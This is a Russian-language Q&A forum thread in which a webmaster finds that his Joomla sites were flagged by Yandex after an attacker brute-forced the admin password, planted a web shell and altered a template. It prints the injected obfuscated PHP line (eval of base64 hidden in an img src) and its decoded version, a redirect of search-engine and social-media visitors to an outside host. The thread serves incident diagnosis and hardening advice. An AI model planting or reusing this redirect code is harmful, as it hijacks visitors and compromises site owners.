На сайте www.*****.ru обнаружен потенциально опасный код

Question

[odmin4eg]

Яндекс что-то поломал у себя, у меня половина сайтов на разных хостингах, на своих серверах, не важно где размещён сайт.

появляются вот такие сообщения.

а в webmaster.yandex.ru вообще картина маслом.

На сайте www.*****.ru обнаружен потенциально опасный код 4.02.2012
На сайте *****.su обнаружен потенциально опасный код 3.02.2012
Перепроверка сайта *****.su не выявила потенциально опасного кода 31.01.2012
На сайте *****.su обнаружен потенциально опасный код 28.01.2012
Перепроверка сайта *****.su не выявила потенциально опасного кода 25.01.2012
На сайте *****.su обнаружен потенциально опасный код 25.01.2012
Перепроверка сайта www.*****.ru не выявила потенциально опасного кода 20.01.2012
На сайте www.*****.ru обнаружен потенциально опасный код 14.01.2012

за свои сервера ручаюь и антивирусами и сам код проверял и руткиты, сервер свежий, ограничения доступа есть.
левого кода в ХТМЛ отдаче нету.
с помощью этого сервиса www.bertal.ru
ставлю юзерагент яндекса тыкаю проверку, обычный чистый хтмл код без примесей.

В общем пичалька.

тем временем сайт выпал из выдачи, поток клиентов скатился на минимум.

В притом подробностей нету какой конкретно код он нашёл.
То есть на лицо факт что, как такового вируса нет, а яндекс ругается на гугла аналистик?

В общем это я лошаро, полез передвинуть скрипты гугла анлистика, а там ахтунг

<img src="<?php         eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcW
F6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR
0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZ
XIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0
cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIs
Im5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc
3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0
cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylc
JmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0
cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRy
ZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwi
aW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vaW5kdXN0cnkuYmVlLnBsLyIpOw0KZXhpdCgpOw0KfQ
0KfQ0KfQ0KfQ==")); echo $this->baseurl ?>

и т.п.

начал копать когда в бэкапах изменился этот скрипт, а получилось, что изменился он в момент перезда с одхого хостинга на другой, перезаливал клиент, и сайт выливался с одного хостинга нормальный, а заливался на другой хостинг уже с изменёнными скриптами

Хотя это по одному сайту, непонятно что по второму.

Comments

[odmin4eg]

ребят, не сливайте, понимаю лошара, написал впорос не до конца разобравшись в вопросе.

сам виноват мой косяк, поэтому вопрос через минуту после публикации я дописал и отметил что нашёл тот кусочек кода

Расшифровав ту ахинею что выше всё просто делает вот такую шляпу.

error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://industry.****.pl/");
exit();
}
}
}
}

поэтому я сос воей стороны видел, что всё в порядке, вопросо больше нету…

не используйте ламерские пароли

Брутфорсом подобрали пароль к админке джумлы изменили шаблон.

Answer 1

[galanthus]

не пробовали зайти с андройда? может оперу попросят обновить?

Answer 2

[Sergey]

Эээ, а где вопрос? Мы же в Q&A, верно?

Comments

[Evengard]

Человек наверно уже после написания вопроса нашел решение — ну и дописал его.

Answer 3

[YourChief]

откуда инфа, что брутфорсом, а не что вас протроянили?

Comments

[odmin4eg]

Логи апача подсказали ;)
потом с этого ипа была активность в админке, все остальные логи были чисты

Answer 4

[petushok]

А вопрос где? Такие вещи нужно писать в блог «Я негодую».

Answer 5

[shagguboy]

прогони clamAV

Answer 6

[GrassNetworks]

Дружище, разобрался что с другими сайтами?

Comments

[odmin4eg]

Да и с другими всё понятно, один пароль на время разработки нескольких сайтов, сайты лежат на одном сервере, а вот все мы хорошо знаем что нет ничего более постоянного чем врмеменное, когда человек подобрал пароль к одному сайту допустим на джумле, он входил на соседние с этим же логином паролем, залил туда некий mod_system
который являлся вэб_шеллом
но там беда не большая, настройки безопасности пхп и вэбсервера не позволяли ему нормально работать.

Но это касается одного сервера, а вот с внешними хостингами пока неясна ситуация, vps от hc.ru недоступен, админ той впски тоже :) пока ждём

Answer 7

[dobersoft]

pastebin.com/M3eNERp7 — отловил вредоносный код, поместив сохранялку на место выполнялки.
Рекомендации:
— не держать все яйца в одной корзине
— вебмастеров, которые просят поставить права 0777, бить по рукам
— использовать хорошие пароли

Comments

[odmin4eg]

Да, всё верно.
сервер был настроен на полную изоляцию сайтов друг от друга, но был эпик фейл, при переезде сайта «друга», сайт был написан на похапе лет 6-7 назад, и не работал без «safe_mode off»
пока был переезд отлавливали всё ошибки версия пхп сильно сменилась, и вот поставили «офф».
после чего стали на ура работать пловина php-shell

сайт перехал работал, друг полетел в тайланд обещая по приезду поправитьс айт и оставить как есть.
вот за эту неделю и случилось чудо, был подбор пароли и загрузка шелла.

сейфмод осатавил только для сайта друга, и ограниченный вход на сайт по ИП. пока он не вернётся с тая.
шелл перестал работать, точнее он никак не мог уже ни посмотреть не навредить другим сайтам.

По хорошему надо запрещать исполнять пхп из каталогов загрузки права на запись только в эти каталоги загрузки.
Пароли разные и не простые, расслабился просто, долго у меня были всяки абракадабры, а тут вот :(